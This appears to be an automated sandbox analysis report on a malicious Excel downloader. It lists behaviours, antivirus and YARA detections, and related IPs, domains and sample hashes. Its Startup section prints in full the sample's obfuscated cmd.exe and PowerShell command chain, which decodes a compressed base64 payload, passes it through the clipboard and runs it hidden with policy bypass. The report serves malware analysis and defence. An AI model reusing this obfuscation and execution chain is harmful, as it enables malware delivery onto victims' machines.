Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
21:40:27	API Interceptor	4952x Sleep call for process: EXCEL.EXE modified
21:40:30	API Interceptor	1x Sleep call for process: clip.exe modified
21:40:33	API Interceptor	3x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
20310_011_11353_0_88.xls	22%	virustotal		Browse
20310_011_11353_0_88.xls	9%	metadefender		Browse
20310_011_11353_0_88.xls	100%	Avira	VBA/Dldr.Agent.yogrg

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.1249360856.012C0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000002.1249342410.006B0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000008.00000002.1264839354.01CC0000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000000.1248635443.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000003.1249027719.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000008.00000002.1263643081.01290000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000008.00000002.1263634948.01287000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000000.1248720839.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000000.1248969895.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000008.00000002.1263500876.00400000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000008.00000002.1263628810.01280000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000000.1248315695.00010000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000006.00000002.1249262618.00340000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth
00000008.00000002.1264845731.01CC7000.00000004.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
64.210.135.68	Ft_000058_000_010994_10918.xls	f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1	malicious	Browse
	Ft_000021_000_010695_10407.xls	0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540	malicious	Browse
	DOC2410201810129420.xls	54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e	malicious	Browse
	DOC2410201810129420.xls	54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e	malicious	Browse
	Ft_000059_000_010075_10942.xls	0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540	malicious	Browse
	DOC___.xls	c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a	malicious	Browse
	fatt F n.25570 2018.xls	321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5	malicious	Browse
	3D0971 DOC20181101126.xls	003e8c865e8f9dee8d0e2d6cdb990a6cbc553684fb03fc095bb900578f814361	malicious	Browse
	3D0971 DOC20181101126.xls	003e8c865e8f9dee8d0e2d6cdb990a6cbc553684fb03fc095bb900578f814361	malicious	Browse
	Ft_000059_000_010075_10942.xls	0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
images2.imgbox.com.sds.rncdn7.com	Ft_000058_000_010994_10918.xls	f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1	malicious	Browse	64.210.135.68
	Ft_000021_000_010695_10407.xls	0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540	malicious	Browse	64.210.135.68
	8730944.xls	bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668	malicious	Browse	64.210.135.72
	DOC___.xls	c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a	malicious	Browse	64.210.135.70
	Ft_000021_000_010695_10407.xls	0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540	malicious	Browse	64.210.135.72
	36Ft_000074_000_010126_10639.xls	6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353e	malicious	Browse	64.210.135.72
	DOC2410201810129420.xls	54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e	malicious	Browse	64.210.135.68
	DOC2410201810129420.xls	54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e	malicious	Browse	64.210.135.68
	8730944.xls	bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668	malicious	Browse	64.210.135.72
	20181106xxxxx.xls	81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804	malicious	Browse	64.210.135.70
	Ft_000059_000_010075_10942.xls	0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540	malicious	Browse	64.210.135.68
	Ft_000058_000_010994_10918.xls	f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1	malicious	Browse	64.210.135.70
	52fatt F n.49198 2018.xls	ae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0	malicious	Browse	64.210.135.70
	52fatt F n.49198 2018.xls	ae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0	malicious	Browse	64.210.135.70
	fatt F n.25570 2018.xls	321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5	malicious	Browse	64.210.135.70
	DOC___.xls	c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a	malicious	Browse	64.210.135.68
	fatt F n.25570 2018.xls	321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5	malicious	Browse	64.210.135.68
	36Ft_000074_000_010126_10639.xls	6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353e	malicious	Browse	64.210.135.70
	3D0971 DOC20181101126.xls	003e8c865e8f9dee8d0e2d6cdb990a6cbc553684fb03fc095bb900578f814361	malicious	Browse	64.210.135.68
	20181106xxxxx.xls	81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804	malicious	Browse	64.210.135.70

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SWIFTWILL2-SwiftwillIncUS	Ft_000058_000_010994_10918.xls	f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1	malicious	Browse	64.210.135.68
	Ft_000021_000_010695_10407.xls	0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540	malicious	Browse	64.210.135.68
	8730944.xls	bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668	malicious	Browse	64.210.135.72
	DOC___.xls	c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a	malicious	Browse	64.210.135.70
	Ft_000021_000_010695_10407.xls	0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540	malicious	Browse	64.210.135.72
	36Ft_000074_000_010126_10639.xls	6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353e	malicious	Browse	64.210.135.72
	DOC2410201810129420.xls	54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e	malicious	Browse	64.210.135.68
	DOC2410201810129420.xls	54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e	malicious	Browse	64.210.135.68
	8730944.xls	bfe8ab19b3e3273999f7045651e745fad67690e314a5ae32a5f245c4576bc668	malicious	Browse	64.210.135.72
	20181106xxxxx.xls	81e10dc5acf7b150591d147c1101fed72d90648f1ec40a20798836d07258b804	malicious	Browse	64.210.135.70
	ne4zvSJk0V.apk	b9985334412f3ee2b84fa5152384be7a0906afad62ac3e843499a48e2b28e8e9	malicious	Browse	94.199.253.33
	oTv8gvbipf.apk	32ba51b250f73f29f47269d7edbc3982e1f864d6604f4396e58eaf9cb1b0194d	malicious	Browse	94.199.253.33
	Ft_000059_000_010075_10942.xls	0fa2d0e86ffca3b299776ef219a1ca248f8bc89eb866c39894780c97859c7540	malicious	Browse	64.210.135.68
	Ft_000058_000_010994_10918.xls	f06ebe75d30a2855c3dd1c6e7b3430765213c52db423f818f770b74329f451a1	malicious	Browse	64.210.135.70
	52fatt F n.49198 2018.xls	ae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0	malicious	Browse	64.210.135.70
	52fatt F n.49198 2018.xls	ae4c98515670770d48c0b1fb4fb8e7c5c831ff616a40911bfc4e3ce98740dcf0	malicious	Browse	64.210.135.70
	fatt F n.25570 2018.xls	321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5	malicious	Browse	64.210.135.70
	DOC___.xls	c5e3ea84d2367239a3edff9074158e7af13b95edbc87d576c8d97e2536f3ba3a	malicious	Browse	64.210.135.68
	fatt F n.25570 2018.xls	321a56baeb6b31fd1a93cf927d590c9d0d04c331d906bc81b31839d9e56ce8d5	malicious	Browse	64.210.135.68
	36Ft_000074_000_010126_10639.xls	6b2ed68a3f17b257a14a727198566b0c32b08408e758ff4c178c6d692211353e	malicious	Browse	64.210.135.70

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

EXCEL.EXE (PID: 1824 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 716335EDBB91DA84FC102425BFDA957E)

cmd.exe (PID: 2808 cmdline: CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nta','ese',( \''&&set k2G=Fcgjp5&&set y41=RGJGLLoPE1&&set dAs=49}{7}{51}{5}{2&&set sBW=uCbCLFi5BuJ&&set xZ=bl5RXj&&set FD=1CerMt7ONo0c','q','oSU&&set i9PL=;.&&set sD=6hkJYL&&set 96f=S'' )^^^^^^^^^^^^^^^|.(''{0}{1}{&&set fH=tiONP&&set JF=ao&&set RO=YlN&&set GrLY=zZ','&&set yMaD=o5&&set XeL=}{1&&set L4=Ui&&set Yu=xW4i57aY&&set AG=js5R6Eb08Ls3','bxS&&set gS=ZL89PzDtI&&set 2JBb=14}{&&set qpO=-w 1 -nopR -sta -ExEcU&&set S1=d1KdrFAH&&set 5c=RN3RKBBV9ZXsjbAx8rLF&&set VZA=Vy7l4Jxf&&set M93h=gb&&set po=oL &&set i8=-f 'InG','TOS','Tr').\''IN`VOkE\''(&&set 7wv=u&&set aLve='),'Pr','t'&&set rdfX=43&&set ld=6}&&set 97tN=e8&&set JNvz=7+F','xvUjxS&&set Pj=M&&set J6=W&&set MTk=4&&set XjK=7ooYCqFO5CUzUMaaw92FK','WF&&set fWO4=OdQrtlwhW0wsc7/TRio00qZdd5&&set RLj=bR&&set mC=y3ANhm&&set 5m=E5C3FlV6&&set ibgE=FAmCFN0Ol&&set quG=nG''((''{22}{44}{11}&&set 79=P&&set pIA=2Edc7LZcTpp&&set QEdm=D4Xj&&set vrWE= ${vErb`o`sE&&set WMP='&&set mOv=25}{21}{28}{37}{40&&set kEQz='&&set JaD=qasUyJ1dKYY+V0F&&set fV=.text.ENcOdING]::''AS`C&&set Pb={1}\''&&set LHM=v&&set pw8t=GaxGO/xX1CYmTXt&&set 7y=I7&&set XT=s&&set yV=uo&&set QD=i6SO&&set iWT=]::''F`R`o`MBAse`64Stri&&set qrQ=zfPUPs5JaAFW&&set Dy=0/e&&set 4NX=','jHSOn&&set g3fn=`oE`Nd''( )}&&set RT=xE','C'&&set jB={0}{47}{33}{30}{1}{34}{50}{4}{46}{31&&set 2su=PlkIRSG','fSl+lb0CYnloyxTlthMl6&&set rC=}{29}{9}{&&set 8Y=4&&set 5v=hCdAfH4pl9',&&set xd= )[1,3] &&set 4Y=AefjFQblNcpE4lg&&set 8lU=','ejG/pwf4EiFPQC3Y&&set Oo=yo2dMx&&set WxJY=+ 'x'-JoiN'' )( ( [S&&set Mcz=L&&set Wyh=QbYcFAGfmhTt/WAKoZjvt5XsB/HY&&set 6p=Xa/O6smRbnn','32O&&set 3O7I=LkcB'&&set JtM=LdXzlH5AiqodnkybHbbbrH&&set LK='0Lv6L&&set pD=10}'' -f '&&set gqy= -f 'eX','t','eTt' )).\&&set 6LrC=Ystem.w&&set xQV='g',( \''{2}{0}{1}\''&&set 9CU='xL1w032cbz&&set Y27=LRcf487TKv0QauRlD9be1uKl&&set DAk=}{48&&set k1W=T&&set GZJ1=inD&&set oh= IO.`&&set XB=a6P&&set kG=6f&&set fUI=bMjUo673DHHJu8i','&&set m2=24}{2}{42}{19}{45}{&&set K7=).\''inVO`kE\''(' ' &&set OrFY=GNTS1+BpbbHL1tF3iYVG&&set PH=cMdBAWkCsFa','LKyC','e0p+w0Bofaf/Lyle2u7B3WVDcyxF4zTu6pwrh&&set wZHB=J&&set MVT3=Brmg4ISxL&&set 21=}{35}&&set 8Ne=+sR8Ei7goBM&&set gi1h=^^^^^^^| ^^^^^^^^^^^^^^^&(''{0}{1}''-f 'f','ORea&&set I3ae=','dHKk2y&&set f8N1=s/pjm5QG+Uw','As&&set RfN=oV','o','oEET',&&set dnk={&&set okc=hdO0fMc1&&set f2=A&&set kNPC=Lyj0hSicUL1suvPnX&&set AqH=4/&&set 8B=\''{2}{&&set At=','e','W-&&set szN=ZEGBZ8L/Vs','Nuj8jM2MH','BlogkZxleJ&&set Vn=.Clipbo&&set S9=ard]::(&&set 2h=IYQSiCG&&set iL=L . (&&set D9nJ=''i`N`V&&set DA= &&set 8zYQ=c&&set oc=H1&&set aEs=hoNLSo&&set gH81=,'&&set ivp=ftK8UuZ5LdqmBaILN&&set ak=IC&&set wAIB=fPnVU0HoT+&&set MNA=E','tN&&set m4={2}{0}{&&set Rd3=wJ'&&set WYi=aFd&&set Fjwh=N.C&&set oD=`AteSTrE`AM( [SYSt&&set SVbw=ALYNhELyiaA1M1&&set aJ=34]+'x')( .(''{1}{0}{&&set Ms1U=by&&set so1T=Pre&&set XVj=w==','1K&&set xlCT=s2DS//e&&set LU0G=B&&set oWS=HNugXUPjnVoGb3bE7e','XWc4t&&set gSCj=D&&set Yzur= &&set opQ=),[sYsTe&&set OdW=oWS.CLiPboaRd]::(&&set Kxc6=Pc+BeNlKIqoxmnaJ&&set ay=NvjPN2m&&set WF=qhsxvF6ggHSAvv&&set 4KVu=( ${pS`h`OmE}[4]&&set 8v1=oKp&&set QMEZ={38}{41}{15}{13}{27&&set v1=0}{1}\'' -f 'e&&set qid=jqwa6Bj','oZEH81Es7&&set 4E0y= [syStEM&&set lwe=40+HZpXFA&&set 7ut= \''{2}{0}{1}\'' &&set F24u=K&&set GWCJ=ver&&set Mh=9HhxiqChyuK&&set ly=A&&set Rn='neW-','jECT') IO.CO&&set Wy=qiY2Jya4B5oLmH&&set lQ=2}&&set Lz=,'bE&&set Sye4=B&&set xzU='GDL&&set jkew=zEJFZG','&&set 7FGL=,'Iz&&set lskm=EcHO/^^^^^^^^^^^^^^^&&&set wyNR=NS1blIorpYOOdplN65rKj&&set Rpm=fA3bUz/Phr&&set Qe=em.io.MEMorYSTREam][sYSte&&set PN=ES&&set 7GBY=BOZV5&&set x58A=efrqnAUABd+h0nPdJvf7SH&&set pN0=xnma7xH&&set xvz=\'' &&set ivU={&&set WIUk= ^^^|cLiP^^^&^^^&cMd /C poweRS&&set K90z=B&&set x0=z+mg7N&&set 2PKZ=n&&set 8o=Xv2h6+XDuwrB2UzD&&set xI=)&&set vl1D=kFtFBYL7hXXHaH&&set JxP5=2NIa13B2VYlABNEyPGpc&&set LG=DdlpSoWp+ZSu2&&set QI=3}{23}{17&&set 4KG1=3JlvvCkqSn&&set w8PF=L/&&set AR= -f 'T','ext' ),'S'&&set Qm=/2+p/&&set fvVc=et&&set qe6u=''-f 'oB',&&set JH3p=CMioW+&&set rxku=X&&set gED=5eVNRxBB&&set aS=P`REf&&set SA=E`ADER( ${&&set xnM= ( &&set g274=f8Zz+ZY201PTp&&set OyI=m.iO.COm&&set lVa=pO&&set LoKD= \''{0}{1}\'' -f&&set SzR4=}{16}{36}&&set OWD=TLR',&&set Dgc=qmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+&&set s06=s0uJ8LMG&&set G6=`ereNce}.( \''&&set g1=5kPuHoeb2d4V2DswOgiwNQPKP','pxXg&&set VO=}{12}{&&set MI4=oKe&&set 2w=e4UYmTa','iE5d4E&&set X2=11','PFd/&&set i3qb=nmSUbRKm/4PD&&set Ga0p=c','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn'&&set ogN=/&&set GtO={32}{2&&set ot=m.COn&&set VUnC=dVZtc6JIEP4rXVu5CIsSQKNBKx/&&set Di7W=,'5T8EDISyqRylxGVJpP64&&set Kpm=)&&set iX=tuu&&set AX0i=,'sjp6c&&set 6Ay=1}\''-f 'o','re','ionC&&set P7=Ch'&&set vTb=eH0'&&set MEn9=0}{8}{&&set wJzc=_},&&set gV=+VJA&&set gKQ=GFy3gJKWW&&set yD=H&&set FC0k=+${PS&&set Llu=39}{&&set jyOe=BYPaSS -NOnI &&set 7g=Q&&set RqJz=eLl&&set lW8=2}'' -f 'Fo&&set kIO=t2pO',&&set rcp={1}{2}{0}&&set YB=Ws+KLOl&&set A0yL=,&&set MPf=K1dUB4BJsmJlTTDKH9Nv&&set Oswb=UG&&set xDr=,&&set Rn1P=1J7&&set gSPy='SISLxsB+i0VNzgIu9Pt7eBk&&set WJ=QG8twkm+pRZlcthuqcLf&&set 62=E`sSION`.`deFL&&set Wp=){${_}.''&&set qjC=IRS&&set rSoi=m&&set 3Wz=D26&&set qkN=U&&set 85wf=DiHo0&&set 2U=sTrEA`MR&&set O8N='K5AY3vQIdfy+&&set ax=5Zml5EM9PfzlFGjG&&set rMQ=tw','oyn','9F','IKgTW','CVhh6q5k76fS&&set lG2=sZyTl&&call set QJi=%lskm%%4KVu%%FC0k%%MZ%%aJ%%lQ%%qe6u%%Rn%%fXO9%%62%%oD%%Qe%%ot%%GWCJ%%k1W%%iWT%%quG%%jB%%XeL%%FI%%GtO%%ld%%QMEZ%%DAk%%SzR4%%ivU%%Llu%%dAs%%MEn9%%QI%%21%%dnk%%2JBb%%mOv%%VO%%m2%%rdfX%%rC%%pD%%kIO%%9CU%%PF%%Ga0p%%Lz%%dn%%gSPy%%8Ne%%M76%%5v%%kmP%%O8N%%Rpm%%Kxc6%%ibgE%%F24u%%Ms1U%%97tN%%y41%%md%%LU0G%%Rd3%%AX0i%%X2%%w8PF%%qkN%%xZ%%iX%%OWD%%LK%%XVj%%Dgc%%x58A%%JtM%%Wyh%%qrQ%%WMP%%Di7W%%OJo%%5c%%rSoi%%wyNR%%Mh%%2h%%3O7I%%gH81%%Oswb%%L4%%mti%%Y27%%sBW%%JNvz%%i3qb%%MTk%%79%%7g%%jkew%%JH3p%%I3ae%%sD%%RO%%JF%%Mcz%%Wy%%GrLY%%qjC%%8v1%%4Y%%KGUu%%kG%%yMaD%%8zYQ%%a3%%du4k%%JxP5%%ksNm%%6In%%x0%%YB%%ly%%XT%%ay%%Sye4%%jvc%%fWO4%%pw8t%%XB%%ak%%gV%%kNPC%%f8N1%%gSCj%%dq%%oc%%qXy%%gKQ%%8Y%%6x%%OrFY%%g1%%fUI%%VUnC%%Jx19%%ivp%%85wf%%s06%%Vkgt%%gED%%ax%%M93h%%Qm%%okc%%AG%%W39h%%2w%%4KG1%%fvVc%%87kx%%wZHB%%rxku%%LG%%WJ%%7GBY%%MPf%%lVa%%PH%%4NX%%oWS%%8o%%VZA%%Yu%%gS%%k2G%%Pj%%MNA%%sGDZ%%FD%%5m%%Rn1P%%J6%%RfN%%kEQz%%2su%%pIA%%g9R%%A0yL%%lM%%LHM%%7y%%pN0%%f2%%3kP%%Oo%%SVbw%%WF%%RT%%xDr%%xzU%%AqH%%wFhV%%xlCT%%MVT3%%6p%%mC%%WYi%%qid%%K90z%%QD%%RLj%%8lU%%wAIB%%rMQ%%QEdm%%vl1D%%7wv%%2PKZ%%JaD%%XjK%%vTb%%7FGL%%g274%%lwe%%szN%%aEs%%lG2%%fQN%%S1%%ogN%%3Wz%%yV%%Dy%%qK%%opQ%%OyI%%so1T%%34f%%Fjwh%%7T%%PN%%96f%%lW8%%AXSR%%At%%vJIZ%%oh%%2U%%SA%%wJzc%%4E0y%%fV%%xCZA%%gi1h%%P7%%Wp%%p5%%g3fn%%Kpm%%WIUk%%yD%%RqJz%%Yzur%%qpO%%fH%%po%%jyOe%%q3FQ%%iL%%7ut%%Igd%%Op%%3mr%%wpf%%m4%%6Ay%%aLve%%DA%%xI%%i9PL%%xnM%%vrWE%%6jA%%aS%%G6%%rcp%%xvz%%i8%%xd%%WxJY%%6LrC%%GZJ1%%OdW%%LoKD%%xQV%%gqy%%D9nJ%%MI4%%54K%%M3hU%%Vn%%S9%%8B%%v1%%J3%%Pb%%AR%%K7%%KcOP%&&Cmd /C %QJi:''=!7w:~1!%' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 2816 cmdline: Cmd /C %QJi:''='% MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 3064 cmdline: C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG','CMioW+','dHKk2y6hkJYLYlNaoLqiY2Jya4B5oLmHzZ','IRSoKpAefjFQblNcpE4lgpZragUZRw9kIMJM','nf6yvfeRHwys6fo5cRd3b1jNexb2NIa13B2VYlABNEyPGpcSMUVYAdIBG','z+mg7NWs+KLOlAsNvjPN2mBi6Wr0yJa+CgVQ64wlYgUszOdQrtlwhW0wsc7/TRio00qZdd5GaxGO/xX1CYmTXta6PIC+VJALyj0hSicUL1suvPnXs/pjm5QG+Uw','AsDIUjPSUH1VBGFy3gJKWW4FFQB2enJqIYcGNTS1+BpbbHL1tF3iYVG5kPuHoeb2d4V2DswOgiwNQPKP','pxXgbMjUo673DHHJu8i','dVZtc6JIEP4rXVu5CIsSQKNBKx/UsJo7','4d7ftK8UuZ5LdqmBaILNDiHo0s0uJ8LMGki6','U+ZEre4WJW5eVNRxBB5Zml5EM9PfzlFGjGgb/2+p/hdO0fMc1js5R6Eb08Ls3','bxS11Hye4UYmTa','iE5d4E3JlvvCkqSnetoJOLevLKGJXDdlpSoWp+ZSu2QG8twkm+pRZlcthuqcLfBOZV5K1dUB4BJsmJlTTDKH9NvpOcMdBAWkCsFa','LKyC','e0p+w0Bofaf/Lyle2u7B3WVDcyxF4zTu6pwrh','jHSOnHNugXUPjnVoGb3bE7e','XWc4tXv2h6+XDuwrB2UzDVy7l4JxfxW4i57aYZL89PzDtIFcgjp5ME','tNFOv1CerMt7ONo0c','q','oSUE5C3FlV61J7WoV','o','oEET','PlkIRSG','fSl+lb0CYnloyxTlthMl62Edc7LZcTppDDTwyngbQW6fTbNBM9T6eN3+Vxy','Uauer5J/QUvI7xnma7xHAUNemw2mOyo2dMxALYNhELyiaA1M1qhsxvF6ggHSAvvxE','C','GDL4/keacVs2DS//eBrmg4ISxLXa/O6smRbnn','32Oy3ANhmaFdjqwa6Bj','oZEH81Es7Bi6SObR','ejG/pwf4EiFPQC3YfPnVU0HoT+tw','oyn','9F','IKgTW','CVhh6q5k76fSD4XjkFtFBYL7hXXHaHunqasUyJ1dKYY+V0F7ooYCqFO5CUzUMaaw92FK','WFeH0','Izf8Zz+ZY201PTp40+HZpXFAZEGBZ8L/Vs','Nuj8jM2MH','BlogkZxleJhoNLSosZyTloM2d1KdrFAH/D26uo0/eRo5A5SnpE3C/') ),[sYsTem.iO.COmPreSSiON.CoMPResSIoNmODe]::'D`EcO`Mpr`ESS' )^|.('{0}{1}{2}' -f 'Fo','R','eaCH') {.('{0}{1}{2}'-f 'n','e','W-oBjECT') IO.`sTrEA`MRE`ADER( ${_}, [syStEM.text.ENcOdING]::'AS`CIi') } ^| ^&('{0}{1}'-f 'f','OReaCh'){${_}.'r`eadt`oE`Nd'( )}) ' MD5: AD7B9C14083B52BC532FBA5948342B98)

clip.exe (PID: 3012 cmdline: cLiP MD5: 04EBDDCC3A90B6512AEF4AA2EEE36624)

